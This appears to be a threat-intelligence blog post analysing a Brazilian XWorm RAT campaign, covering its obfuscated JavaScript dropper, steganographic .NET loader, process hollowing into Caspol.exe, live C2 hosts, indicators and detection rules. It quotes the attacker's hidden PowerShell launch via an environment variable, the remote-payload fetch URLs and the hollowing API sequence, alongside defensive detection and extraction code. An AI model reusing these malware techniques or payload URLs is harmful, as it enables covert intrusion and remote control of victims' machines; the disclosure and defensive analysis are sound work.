Brazilian XWorm Operator Ships a Loader Named Fiber.Program Running HackForums Process-Hollowing Code — Campaign NkShHr7reN

Published April 7, 2026
Tags: xworm, latam, brazil, babel-obfuscator, process-hollowing, hackforums, steganography, caspol-injection, ddns-abuse, hostinger

TL;DR

On April 7, 2026, MalwareBazaar reporter johnk3r submitted 4c05a4f5… — a 7z archive containing a 2MB obfuscated JavaScript dropper. The kill chain that unfolded is worth writing up in its own right:

7z → obfuscated JS (11k lines of Unicode-noise padding)
   → PowerShell (stored in the INTERNAL_DB_CACHE env var, executed via WMI Win32_Process.Create)
   → fake JPEG from magina.online (steganographic base64 between INICIO== and FIM markers — Portuguese)
   → .NET loader Fiber.Program (Babel-obfuscated, masquerading as Microsoft.Win32.TaskScheduler v2.12.2.0)
   → XWorm RAT (XClient variant) process-hollowed into Caspol.exe
   → C2: alzap.ddns.com.br on a Brazilian Telefonica residential IP

Four things make this campaign novel enough to write up:

  1. Fresh, live C2 infrastructure registered April 6, 2026 — less than 48 hours old, actively serving 2MB+ payloads at time of analysis. Campaign ID NkShHr7reN, mutex mUZGaw4DvK.
  2. The loader (Fiber.Program) embeds literal HackForums process-hollowing code — the namespace HackForums.gigajew.x64 in the decompiled .NET assembly is code reuse from HackForums user gigajew, whose public RunPE posts are now running in a real XWorm campaign. We haven't seen that specific code lineage called out in a published XWorm writeup before, but we're not claiming it's a first — just worth flagging as a pivot point.
  3. The attacker left their C2 MariaDB (port 3306) and FTP (port 21) exposed to the internet — plus a sprawling directory of /c2, /shell, /implants, /agents, /beacon, and /admin endpoints behind 301 redirects. This is a brand-new operator with a brand-new Hostinger VPS and no operational hygiene.
  4. Brazilian attribution signals are overwhelming: Portuguese steganography markers (INICIO== / FIM), Portuguese function name VerificarMinutos ("Check Minutes") in the loader, a Brazilian DDNS provider (BluePex/Winco), and a residential Telefonica Brasil (Vivo, AS18881) IP as the final C2 callback. The Hostinger staging node is in Lithuania; the operator is in Brazil.

We've notified Hostinger abuse for magina.online / 89.116.115.88, Telefonica Brasil abuse for 191.34.194.67, and BluePex for the abused DDNS record. C2 confirmed live at time of writing.


Prior Art

XWorm is not a new malware family. It's been tracked publicly since 2022, when it began appearing on Telegram-based malware-as-a-service marketplaces. The most relevant public research:

Date     | Source          | Finding
2023-09  | The Hacker News | "Inside XWorm: Decoding the Stealthy Tactics of the Latest Variant"
2024     | Todyl           | "XWorm Part 2: Breaking Down the .NET Loader and v4.0" — closest public parallel to Fiber.Program but does not name the loader or identify the HackForums code lineage
2025     | Picus Security  | "XWorm Rises Again: Dissecting the Modular Malware's V6 Resurrection"
2025-11  | Trellix         | "XWorm's Evolving Infection Chain: From Predictable to Deceptive" — v7.2 release
2025-12  | FortiGuard      | Multi-themed phishing, Equation Editor CVE-2018-0802 abuse
2026     | Trellix         | "Old Loader, New Threat"
2026     | CSO Online      | Fileless XWorm phishing chain

Separately, the HackForums.gigajew namespace used inside the Fiber.Program loader traces back to the user gigajew on HackForums, whose RunPE / process-hollowing code has been circulating in that community's reverse-engineering threads on RunPE and process hollowing. That code has been reused in many unrelated projects over the years.

What this report adds to the public record:

  • Names the Fiber.Program loader and documents its 19-parameter Main() config surface
  • Documents the NkShHr7reN campaign ID and mUZGaw4DvK mutex
  • Maps the live C2 infrastructure — magina.online (89.116.115.88, Hostinger LT) and alzap.ddns.com.br (191.34.194.67, Telefonica BR)
  • Calls out the HackForums gigajew RunPE code lineage inside the live XWorm loader as a pivot point for researchers
  • Brazilian operator attribution via multi-signal correlation
  • Documents the operator's exposed MariaDB and FTP services on their own C2 host

If you've seen prior reporting on any of the above and we missed it, please reach out — we'll update this post and credit the earlier source.


Stage 1 — The JavaScript Dropper

7z SHA256:    2261c2a0b9ca14f1f68d83e8bc3f660a681a385b1932945fa826f0be89d39939
7z filename:  4c05a4f5…7.7z (password: infected)
JS SHA256:    4c05a4f514bbc7f84b397abfe571c9c34505b0d142a0e8e13a981c8ffb194857
JS MD5:       10def5076c990b1970ac71cd85fdade1
JS size:      2,147,544 bytes
First seen:   2026-04-07 12:59:33 UTC
Reporter:     johnk3r (MalwareBazaar)
MB tags:      7z, alzap-ddns-com-br, latam, magina-online, xworm

The dropper is a 2.1 MB WSH JScript file that weighs in at 11,698 lines, of which roughly 11,000 are noise. It uses a three-layer obfuscation scheme:

  1. Unicode character separators. Two distinct garbage patterns — ᰦ኉؁⡗ᕨ and ŪՋ೷ሀ⎚🔨➍ᩎ⌵ⲩᎳ඄Ϟ⥗ᢦ — are interleaved between the actual payload characters. The separators defeat basic regex-based signature matching that assumes printable ASCII.
  2. A digammate() helper that is just concatenation. digammate(a, b, c) returns b + a.slice(1) + c. It exists solely to make control flow look complex in a debugger.
  3. A gerenda string builder that assembles the real payload one character at a time across thousands of lines, each line looking identical in a side-by-side diff but actually differing in which Unicode separator was chosen.

The deobfuscated payload does something clever with environment variables:

// Store the decoded PowerShell in a user-scoped env var named after a plausible
// Windows Defender artifact ("INTERNAL_DB_CACHE") so the command line doesn't
// carry the script.
FightWireImages.Environment("User")("INTERNAL_DB_CACHE") = antisilverite(suspiciency);

// Then invoke powershell.exe via WMI Win32_Process.Create, passing a short one-liner
// that expands the env var:
var proposing = 'powershell.exe -ExecutionPolicy Bypass -NoProfile '
              + '-WindowStyle Hidden -Command "IEX $env:INTERNAL_DB_CACHE"';
gesturality.Get("Win32_Process").Create(proposing, null, perineptunium, drumble);

Why this matters for defenders: most command-line telemetry tools will record powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "IEX $env:INTERNAL_DB_CACHE" as the full command — they won't have the contents of INTERNAL_DB_CACHE. Unless your EDR is snapshotting process-scoped environment variables at process creation, you lose the payload at the command-line layer. Detect: alert on any PowerShell invocation that IEX-evaluates an environment variable whose name is not in an allowlist.
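The detection described above, as an added example that is not part of the original report: a small Python triage over constructed process-creation events (record shape and field names are assumptions, not the report's telemetry). It covers the IEX-of-env-var rule, the pipeline form `$env:NAME | IEX` as a generalization of the same idea, and the Caspol.exe parent check from the IoC section.

```python
import re
from dataclasses import dataclass


# Constructed process-creation record (Sysmon EventID 1 / EDR shaped; assumed fields).
@dataclass
class ProcEvent:
    image: str
    parent_image: str
    command_line: str
    outbound_https: bool = False


# Site-specific allowlist of env vars PowerShell may legitimately IEX (assumed empty here).
ENV_ALLOWLIST: set[str] = set()

# Parents that legitimately launch Caspol.exe; the report names msbuild/vstest,
# anything else under "developer tooling" is a per-site decision.
DEV_PARENTS = {"msbuild.exe", "vstest.exe"}

IEX_ENV_RE = re.compile(
    r"\b(?:iex|invoke-expression)\b\s*\(?\s*\$env:(\w+)"   # IEX $env:NAME
    r"|\$env:(\w+)\s*\|\s*(?:iex|invoke-expression)\b",   # $env:NAME | IEX
    re.IGNORECASE,
)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(ev: ProcEvent) -> list[str]:
    """Return the list of findings for one event (empty list means benign)."""
    findings: list[str] = []
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    if image in {"powershell.exe", "pwsh.exe"}:
        for m in IEX_ENV_RE.finditer(ev.command_line):
            name = (m.group(1) or m.group(2)).upper()
            if name not in ENV_ALLOWLIST:
                findings.append(f"powershell IEX of env var {name}")
        # A Win32_Process.Create launch shows WmiPrvSE.exe as the parent, not the
        # script host that requested it (general WMI behaviour, not from the report).
        if parent == "wmiprvse.exe":
            findings.append("powershell spawned via WMI (parent WmiPrvSE.exe)")
    if image == "caspol.exe" and parent not in DEV_PARENTS:
        findings.append(f"caspol.exe with non-developer parent {parent}")
        if ev.outbound_https:
            findings.append("caspol.exe making outbound HTTPS")
    return findings


# Constructed sample events: the dropper's launch as the report records it, the
# hollowed Caspol.exe beaconing out, and two benign controls.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\wbem\WmiPrvSE.exe",
              'powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden '
              '-Command "IEX $env:INTERNAL_DB_CACHE"'),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "caspol.exe", outbound_https=True),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe",
              r"C:\BuildTools\MSBuild.exe", "caspol.exe -l"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe", 'powershell.exe -NoProfile -Command "Get-Process"'),
]

if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        print(i, detect(ev))
```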


Stage 2 — Fiber.Program, the Babel-Obfuscated Loader

The PowerShell stage fetches https://magina.online/MSI_111454.png, which is a valid 3840×2160 progressive JPEG (it renders in a browser) with a base64 payload hidden between the markers IN- and -in1. The extraction recipe:

1. Read bytes between IN- and -in1
2. Reverse the string
3. Replace every '#' character with 'A'
4. base64-decode

The result is a 1,161,216-byte .NET DLL. Loaded via [AppDomain]::CurrentDomain.Load(), it presents itself to tools like ILSpy as Microsoft.Win32.TaskScheduler v2.12.2.0 — the legitimate dahall/taskscheduler community library, which has been merged into the assembly to provide cover. Inside it is a second namespace: Fiber.Program.

Assembly metadata

File Type:   PE32 DLL (.NET assembly)
Framework:   .NETFramework v4.5
Runtime:     v4.0.30319
Namespace:   Fiber
Class:       Program
Disguised:   Microsoft.Win32.TaskScheduler v2.12.2.0 (GitHub: dahall/taskscheduler)
Obfuscator:  Babel Obfuscator (e4 variant)

Decompiling with ilspycmd produces 172,858 lines of C# — the vast majority of which is obfuscation overhead, not real logic.

The 19-parameter entry point

The loader's Main() is a configuration-driven component designed to be reused across campaigns:

public static void Main(
    string encodedUrlPayload,    // URL to download (MSI_111454.png)
    string flagRegStartup,       // Enable HKCU Run key persistence
    string vbsPath,              // VBS wrapper path
    string vbsName,              // VBS wrapper filename
    string clrPath,              // CLR host path
    string nativeDllPath,        // Native DLL path
    string nativeDllName,        // Native DLL filename
    string flagTaskPersistence,  // Enable Scheduled Task persistence
    string payloadUrl,           // Secondary payload URL (img_152603.png = XWorm RAT)
    string outputPath,           // Drop directory (C:\Users\Public\Downloads\)
    string outputName,           // Dropped filename
    string fileExt,              // "js"
    string intervalMinutes,      // Scheduled task interval (13 min)
    string flagStartupTask,      // Enable Startup folder task
    string schedulerTaskName,    // Task name — here: NkShHr7reN (campaign ID)
    string vmDetectionName,      // VM detection profile
    string flagUacStart,         // Enable UAC bypass
    string uacPayloadUrl,        // UAC bypass payload URL
    string uacCommand            // UAC command
)

This is not a one-off XWorm installer. It's a builder-generated loader with every persistence toggle, every URL, every target name, and every campaign ID fed in as a string parameter. The same binary could ship 50 campaigns with zero recompilation.

The literal HackForums code lineage

Buried inside the Fiber.Program loader is a namespace that made us do a double-take:

Namespace: HackForums.gigajew
Class:     x64
Method:    x64.Load(byte[] payloadBuffer, string host, string args)

Load() implements a textbook process hollowing sequence:

CreateProcess (CREATE_SUSPENDED)
  → ZwUnmapViewOfSection(target base)
  → VirtualAllocEx(target, payload size, RWX)
  → WriteProcessMemory(target, payload bytes)
  → SetThreadContext / GetThreadContext
  → ResumeThread
  → CloseHandle

The injection target is hardcoded: Caspol.exe — the .NET Code Access Security Policy tool, which is present on every Windows system with the .NET Framework and which nobody has a legitimate reason to see making outbound HTTPS calls. It's a classic signed-binary proxy.

Why the HackForums namespace is interesting: the HackForums user gigajew (uid=537383) has been posting about RunPE / process hollowing in that forum's reverse-engineering threads. The namespace HackForums.gigajew.x64 is not a subtle homage; it is the literal C# namespace the HackForums user published their code under, copy-pasted into a live XWorm campaign without even renaming. This is the sort of OPSEC sloppiness that makes attribution easier — the operator lifted a public forum post verbatim, which tells us two things:

  1. The operator is a code-reuse actor, not a from-scratch developer. They are assembling components from public sources.
  2. The HackForums forum is still a functional supply chain for malware components in 2026. That thread needs to be on every CTI researcher's radar.

Anti-analysis stack

The Fiber.Program loader ships with a full defensive suite:

Technique               | Implementation
VM detection            | VirtualMachineDetector class — SMBIOS vendor strings, WMI Win32_ComputerSystem.IsVirtual, process/service enumeration (vbox, vmware, vmtools)
Anti-debug              | CheckRemoteDebuggerPresent, IsDebuggerPresent, NtQueryInformationProcess(ProcessDebugPort), System.Diagnostics.Debugger.IsAttached
Anti-profiler           | Reads COR_PROFILER and COR_ENABLE_PROFILING environment variables at startup
Analysis-tool detection | Enumerates running processes for dnspy, vsdbg, de4dot, smoketest, babelvm, AssemblyServer, SimpleAssemblyExplorer
Anti-tamper             | PE section integrity verification → Environment.FailFast(null) on any mismatch
String encryption       | Encrypted resource vTFM (17,635 bytes) — XOR with a rotating 6-byte key, decrypted at runtime via dynamic IL method generation

The Environment.FailFast(null) on tamper detection is a particularly aggressive choice — it skips all finalizers and crash handlers, making post-mortem analysis harder than a plain Process.Kill.

The Portuguese tell

Inside the loader, alongside all the obfuscated symbol names, sits a helper class with an unobfuscated method name:

public static class Class15
{
    public static void VerificarMinutos(...)  // "Check Minutes" (Portuguese)
}

VerificarMinutos is the scheduled-task-interval helper that feeds into the Babel-wrapped persistence code. The developer forgot to rename it during obfuscation — or rather, Babel's symbol renamer only renames compiler-generated symbols, not the developer's public API surface. For our purposes, it's a cleartext Portuguese function name in a commercial-obfuscated .NET loader, which is an attribution signal that would be hard to fake.


Stage 3 — The XWorm RAT (XClient variant)

The Fiber.Program loader then fetches https://magina.online/img_152603.png, a second steganographic JPEG. This time the markers are INICIO== and FIM (Portuguese for "start" and "end") — another Portuguese tell in the same kill chain. Extraction recipe:

1. Read bytes between INICIO== and FIM
2. Replace every '#' character with 'A'
3. Reverse the string
4. base64-decode
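An added extraction helper for both carriers (this is not the actor's tooling and not code from the original report): it carves the marker-delimited blob with the stage-2 and stage-3 recipes above and does a first-pass header check on the result. A constructed stand-in replaces the real JPEGs, and the fixture builder exists only to produce offline test input; the assumption that the blob ends at the first end marker after the start marker is ours.

```python
import base64

# Marker pairs the report documents for the two carriers.
STAGE2_MARKERS = (b"IN-", b"-in1")       # MSI_111454.png -> Fiber.Program loader
STAGE3_MARKERS = (b"INICIO==", b"FIM")   # img_152603.png -> XWorm XClient RAT


def carve(carrier: bytes, start: bytes, end: bytes, reverse_first: bool) -> bytes:
    """Pull the marker-delimited blob out of a carrier and undo the encoding.

    reverse_first=True follows the stage-2 recipe (reverse, then '#'->'A');
    False follows the stage-3 recipe ('#'->'A', then reverse). The two steps
    commute, so both orders give the same bytes; the flag only mirrors the report.
    Assumption: the blob ends at the first end marker after the start marker.
    """
    i = carrier.find(start)
    if i < 0:
        raise ValueError(f"start marker {start!r} not found")
    i += len(start)
    j = carrier.find(end, i)
    if j < 0:
        raise ValueError(f"end marker {end!r} not found")
    blob = carrier[i:j]
    if reverse_first:
        blob = blob[::-1].replace(b"#", b"A")
    else:
        blob = blob.replace(b"#", b"A")[::-1]
    # validate=True rejects anything outside the base64 alphabet, so a wrong
    # marker pair or a damaged carrier fails loudly instead of yielding garbage.
    return base64.b64decode(blob, validate=True)


def extract_stage2(carrier: bytes) -> bytes:
    return carve(carrier, *STAGE2_MARKERS, reverse_first=True)


def extract_stage3(carrier: bytes) -> bytes:
    return carve(carrier, *STAGE3_MARKERS, reverse_first=False)


def describe_pe(data: bytes) -> dict:
    """Minimal triage of a carved blob: MZ magic and e_lfanew at offset 0x3C.

    The XClient sample had e_lfanew zeroed, so 'MZ' plus a zero e_lfanew is the
    loader-dependent PE fingerprint the report describes, not a parse failure.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return {"is_mz": False, "e_lfanew": None, "e_lfanew_zeroed": False}
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return {"is_mz": True, "e_lfanew": e_lfanew, "e_lfanew_zeroed": e_lfanew == 0}


# --- constructed test fixture (ours, not the actor's encoder) ----------------
def build_constructed_carrier(payload: bytes, start: bytes, end: bytes) -> bytes:
    """Wrap a payload the way the recipes imply (base64, 'A'->'#', reversed)
    between the given markers after a fake JPEG prefix, so the extractors can
    be exercised offline without the real carriers."""
    encoded = base64.b64encode(payload).replace(b"A", b"#")[::-1]
    return b"\xff\xd8\xff\xe0 constructed JPEG stand-in " + start + encoded + end + b"\xff\xd9"


# Constructed stand-in for the XClient PE: MZ magic, e_lfanew (0x3C..0x3F) zeroed.
FAKE_XCLIENT = b"MZ" + bytes(0x3A) + bytes(4)

if __name__ == "__main__":
    carrier = build_constructed_carrier(FAKE_XCLIENT, *STAGE3_MARKERS)
    print(describe_pe(extract_stage3(carrier)))
```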

The payload is a 52,227-byte XWorm RAT (the "XClient" variant). Its PE is deliberately corrupted:

  • e_lfanew pointer zeroed (should point to the PE header at offset 0xFE)
  • All .NET metadata stream sizes zeroed
  • #Strings table interspersed with 2-4 character garbage strings (vV%6W'f, 6WE, 7FV) to defeat string-extraction tooling
  • No recoverable #US (User Strings) table — all config values encrypted

This PE won't load without the loader's bootstrap, which fixes up the headers in memory before handing control to the entry point. This is a common XWorm tactic documented in the Todyl report, but the specific corruption pattern here is a fingerprint we can pivot on.

Recovered capability strings (from the partially-reconstructed metadata):

Spread                     # USB / network propagation
Antivirus                  # AV enumeration / evasion
Hidden                     # Stealth mode
ReportWindow               # Active-window reporting
capGetDriverDescriptionA   # Webcam capture
PreventSleep               # Keep-alive
RunDisk                    # Disk operations
OpenUrl                    # Browser manipulation / drive-bys
RijndaelManaged            # AES-ECB with MD5-derived key
MD5CryptoServiceProvider   # Key derivation
CreateMutex                # Single-instance
RegistryKey / CreateSubKey / DeleteSubKey  # Persistence
Caspol                     # Injection target (hardcoded)
XClient                    # Variant identifier

This is the standard XWorm capability set — nothing exotic at the RAT layer. The novelty is everywhere upstream of the RAT: the loader, the steganography, the HackForums code reuse, the Brazilian OPSEC tells.


The C2 Infrastructure

Primary: magina.online (89.116.115.88)

A staging node on Hostinger VPS (AS47583, Lithuania) — registered one day before first sighting.

Domain:         magina.online
IP:             89.116.115.88
ASN:            AS47583 AS-HOSTINGER, CY/LT
CIDR:           89.116.115.0/24
Registrar:      Hostinger (UAB)
Created:        2026-04-06 13:54:50 UTC
NS:             helios.dns-parking.com, aster.dns-parking.com (Hostinger parking — default, no custom DNS)
TLS:            Let's Encrypt R13, issued 2026-04-06 13:03:19 UTC — 51 minutes before the domain was registered
Serial:         06FF68038E2E05EEAA25269910EBE15E4AA7
Web server:     LiteSpeed httpd
Database:       MariaDB 11.8.6-log — port 3306 exposed to the internet
FTP:            Port 21 exposed to the internet (220 FTP Server ready.)
WHOIS privacy:  ICANN RDDS redacted (Tucows Registry)

The TLS certificate being issued before the domain registration is unusual but not impossible — Hostinger's default provisioning flow can pre-issue a cert the moment DNS points at their load balancer. What it tells us is that the operator used Hostinger's turnkey VPS provisioning wizard, not a custom deployment.

The exposed MariaDB and FTP are the real story. A professional operator would firewall those. This person didn't. During the blitz dump, GHOST observed:

  • MariaDB 11.8.6-log banner on port 3306 (mysql_native_password auth enabled)
  • FTP on port 21 responding with a bare 220 FTP Server ready.
  • A sprawling 200+ endpoint inventory behind 301 redirects: /c2, /shell, /implants, /agents, /tasks, /beacon, /admin, /panel, /dashboard, /console, /check-in, /callback, /exec, /upload, /download, /payload, /api/*, /graphql, /webhook, /api/datasources, /api/v1/targets, /metrics, /phpmyadmin, /adminer, /mysqladmin, /pma
  • /.git/config, /.git/HEAD, /.svn/entries, /.svn/wc.db present but 403 — meaning a repository exists, just not yet leaked

This is somebody running a malware operation out of a $5/month Hostinger VPS with default configs. It is exactly the pattern we see with new LATAM operators who are graduating from running samples on their laptop to a public IP for the first time.

Secondary (the actual RAT C2): alzap.ddns.com.br (191.34.194.67)

The XWorm RAT payload, once decrypted, points at a completely different host:

Domain:          alzap.ddns.com.br
IP:              191.34.194.67
ASN:             AS18881 TELEFONICA BRASIL S.A
CIDR:            191.34.192.0/19
ISP:             Telefonica Brasil / Vivo (largest ISP in Brazil)
Classification:  Residential
DDNS Provider:   BluePex / Winco (ddns.com.br — Brazilian DDNS service)
DDNS Owner:      BluePex Controle e Seguranca em TI Ltda

This is a Brazilian residential IP with a Brazilian DDNS service. The operator is running the final C2 from their home internet connection in Brazil, using a Brazilian commercial DDNS provider to handle the dynamic IP. That's not an OPSEC choice — that's an inability to afford or configure a bulletproof host for the callback side of the operation.

The magina.online Hostinger VPS is only the staging/distribution layer. The RAT itself phones home to the operator's house.


Brazilian Operator Attribution

We have five independent signals putting the operator in Brazil:

  1. Portuguese steganography markers: INICIO== / FIM in the second-stage JPEG
  2. Portuguese unobfuscated function name: Class15.VerificarMinutos ("Check Minutes") survived Babel's symbol renamer
  3. Brazilian DDNS service: alzap.ddns.com.br is a BluePex/Winco DDNS — a Brazilian company serving Brazilian customers
  4. Brazilian residential ISP: Telefonica Brasil (Vivo) AS18881 for the RAT callback IP
  5. MalwareBazaar latam tag: the reporter (johnk3r) classified it as LATAM-targeted based on the domains and language markers

Each signal is individually weak. Together they're strong — the loader Babel-obfuscated everything except the Portuguese method name, which means the developer wrote Portuguese natively and never considered it a leak.


MITRE ATT&CK Mapping

Tactic              | Technique                                          | ID
Initial Access      | Phishing: Spearphishing Attachment                 | T1566.001
Execution           | Command and Scripting Interpreter: JavaScript      | T1059.007
Execution           | Command and Scripting Interpreter: PowerShell      | T1059.001
Execution           | Windows Management Instrumentation                 | T1047
Execution           | User Execution: Malicious File                     | T1204.002
Persistence         | Scheduled Task/Job                                 | T1053.005
Persistence         | Registry Run Keys / Startup Folder                 | T1547.001
Defense Evasion     | Obfuscated Files or Information                    | T1027
Defense Evasion     | Process Injection: Process Hollowing               | T1055.012
Defense Evasion     | Masquerading: Match Legitimate Name                | T1036.005
Defense Evasion     | Virtualization/Sandbox Evasion                     | T1497
Defense Evasion     | Execution Guardrails: Environmental Keying         | T1480.001
Command and Control | Encrypted Channel                                  | T1573.001
Command and Control | Application Layer Protocol: Web Protocols          | T1071.001
Command and Control | Dynamic Resolution (DDNS)                          | T1568.002
Command and Control | Ingress Tool Transfer                              | T1105
Collection          | Screen Capture                                     | T1113
Collection          | Video Capture                                      | T1125
Lateral Movement    | Replication Through Removable Media                | T1091

Indicators of Compromise

File hashes (SHA256)

2261c2a0b9ca14f1f68d83e8bc3f660a681a385b1932945fa826f0be89d39939  7z archive
4c05a4f514bbc7f84b397abfe571c9c34505b0d142a0e8e13a981c8ffb194857  JS dropper
53c3e0f8627917e8972a627b9e68adf9c21966428a85cb1c28f47cb21db3c12b  Fiber.Program loader (.NET DLL)
7c18dfe88698ad11830089f35f2fbc3f9773a549b5a7cb2597deb0d7fcbce9d3  XWorm XClient RAT
6bce2dd7b61a662650ffa16e886d1f3da01377841882bbcc4081305d17b14f57  MSI_111454.png (Fiber.Program carrier)
ccd5d5e9619538b82a6b8e194f180cf084bc1a20cdd39e447c3f73264c3330e9  img_152603.png (XWorm carrier)

Network

magina.online                  # Stage 2/3 payload distribution (Hostinger LT)
alzap.ddns.com.br              # XWorm RAT C2 (Telefonica BR residential)
89.116.115.88                  # magina.online
191.34.194.67                  # alzap.ddns.com.br

https://magina.online/MSI_111454.png   # Fiber.Program loader carrier
https://magina.online/img_152603.png   # XWorm RAT carrier
https://magina.online/bkp              # Persistence script

TLS

Issuer:  Let's Encrypt R13
CN:      magina.online
Serial:  06FF68038E2E05EEAA25269910EBE15E4AA7
Valid:   2026-04-06 13:03:19 UTC → 2026-07-05

Host / Behavioral

Env var:       INTERNAL_DB_CACHE             # PowerShell payload staging
Mutex:         mUZGaw4DvK
Campaign ID:   NkShHr7reN
Drop path:     C:\Users\Public\Downloads\
Injection:     Caspol.exe (.NET CAS Policy tool — signed Microsoft binary)
Scheduled task name: NkShHr7reN
.NET namespace: Fiber.Program (disguised as Microsoft.Win32.TaskScheduler v2.12.2.0)
Code-reuse tell: HackForums.gigajew.x64.Load() — process hollowing lifted from HF user gigajew
Portuguese tells: Class15.VerificarMinutos(), INICIO==/FIM stego markers

Suricata / detection pivots

  • Alert on powershell.exe invocations that IEX an environment variable matching INTERNAL_DB_CACHE (or any non-allowlisted env var)
  • Alert on any TLS SNI containing magina.online or ddns.com.br
  • Alert on any Caspol.exe process with a parent that is not msbuild.exe / vstest.exe / developer tooling (especially with outbound HTTPS)
  • YARA pivots on the Fiber.Program loader can key on:
    • Method Class15.VerificarMinutos
    • Namespace HackForums.gigajew
    • Embedded resource vTFM of size 17,635 bytes
    • The 19-parameter Main() signature

Disclosure Timeline

Date                  | Action
2026-04-06 13:03 UTC  | Let's Encrypt cert issued for magina.online
2026-04-06 13:54 UTC  | magina.online registered via Hostinger (UAB)
2026-04-06 14:14 UTC  | MSI_111454.png (Fiber.Program carrier) uploaded
2026-04-06 18:25 UTC  | img_152603.png (XWorm carrier) uploaded
2026-04-07 12:59 UTC  | Sample first seen on MalwareBazaar (reporter: johnk3r)
2026-04-07 13:10 UTC  | GHOST investigation kicks off; C2 payloads confirmed live
2026-04-07 14:20 UTC  | GHOST blitz dump: exposed MariaDB, FTP, C2 endpoint inventory
2026-04-07            | Notify Hostinger abuse (abuse@hostinger.com) re: 89.116.115.88 / magina.online
2026-04-07            | Notify Telefonica Brasil abuse re: 191.34.194.67 (CGI.br / CERT.br)
2026-04-07            | Notify BluePex/Winco re: alzap.ddns.com.br
2026-04-07            | Public disclosure (this post)

Why This Matters

This report is not about a new XWorm variant — the RAT itself is stock. It's about what happens around the RAT:

  1. A new Brazilian operator is using HackForums public RunPE code verbatim, which means the HackForums RunPE thread is still a live supply-chain source for LATAM malware authors in 2026. Threat hunters should be pivoting on HackForums.gigajew and its sibling namespaces across sample corpora to see what else is reusing it.
  2. The Fiber.Program loader is builder-generated — the 19-parameter Main() config surface strongly suggests there is a builder tool somewhere (likely in Portuguese-speaking private forums) emitting these loaders. If you can find the builder, you can fingerprint every loader it ever generated. The resource name vTFM (17,635 bytes) is a great pivot point.
  3. Brazilian XWorm activity continues to be underreported relative to the volume we observe. The combination of Portuguese language markers + BluePex DDNS + residential Telefonica C2 is a strong fingerprint for LATAM XWorm. Defenders in Brazil/Portugal should consider adding *.ddns.com.br to their watchlist alongside the more commonly tracked *.duckdns.org / *.no-ip.org.
  4. The operator's own infrastructure is exposed. MariaDB on 3306, FTP on 21, and a documented directory of C2 endpoints on the same Hostinger VPS as the malware distribution. This operator will be deanonymized within days if a competent researcher takes a serious run at the MariaDB credentials or the exposed filesystem. We are not doing that here (unauthorized access), but we are documenting the exposure so that LE or a CERT with legal authority can.

Credits

  • Sample reporter: johnk3r (MalwareBazaar)
  • Prior art on XWorm loaders: Todyl, Trellix, Picus, FortiGuard, The Hacker News
  • HackForums code lineage: HF user gigajew (uid=537383)
  • Investigation: GHOST automated operator → Breakglass Intelligence

GHOST — Breakglass Intelligence. One indicator. Total infrastructure.
